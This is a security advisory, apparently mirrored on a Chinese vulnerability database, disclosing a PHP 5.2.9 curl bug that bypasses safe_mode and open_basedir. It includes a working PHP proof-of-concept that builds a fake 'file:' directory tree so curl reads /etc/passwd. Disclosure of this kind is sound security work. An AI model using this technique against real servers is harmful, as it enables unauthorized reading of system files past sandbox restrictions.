PHP 5.2.9 curl safe_mode & open_basedir bypass

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052052 漏洞类型
发布时间 2009-04-11 更新时间 2009-04-11
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009040031
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
[ PHP 5.2.9 curl safe_mode & open_basedir bypass ]

Author: Maksymilian Arciemowicz
Date:
- - Dis.: 31.12.2008
- - Pub.: 10.04.2009

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

PHP supports libcurl, a library created by Daniel Stenberg, that allows you to connect and communicate to many different types of servers with many different types of protocols. libcurl currently supports the http, https, ftp, gopher, telnet, dict, file, and ldap protocols. libcurl also supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this can also be done with PHP's ftp extension), HTTP form based upload, proxies, cookies, and user+password authentication.

- --- 1. PHP 5.2.9 curl safe_mode & open_basedir bypass ---
The main problem exist in checking safe_mode & open_basedir for curl functions. There is a difference between checking the access and the implementation of the operations.

Example code:
curl_setopt($ch, CURLOPT_URL, "file:file:////etc/passwd");

curl in the first place check safe_mode and open_basedir for

"file:////etc/passwd" 
/* realpath is ./file:/etc/passwd */

and in next step will read

"file:////etc/passwd"
(without wrapper => /etc/passwd)

To attack, we need to cheat php by creating a virtual tree like

./file:/
./file:/etc/
./file:/etc/passwd/

Example for /etc/hosts :

./file:/
./file:/etc/
./file:/etc/hosts/

So if you execute the file as user X, we have to create special subdirectories.

- ---EXAMPLE-EXPLOIT---
mkDIR("file:");
chdir("file:");
mkDIR("etc");
chdir("etc");
mkDIR("passwd");
chdir("..");
chdir("..");

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "file:file:////etc/passwd");
curl_setopt($ch, CURLOPT_HEADER, 0);

curl_exec($ch);

curl_close($ch);
- ---EXAMPLE-EXPLOIT---

The previous changes, may contribute to this error in php 5.2.9.
We will discourages the use ( safe_mode & open_basedir ) as the main security.

- --- 2. Fix ---
Not use safe_mode and open_basedir like a main safety

- --- 3. Contact ---
Author: Maksymilian Arciemowicz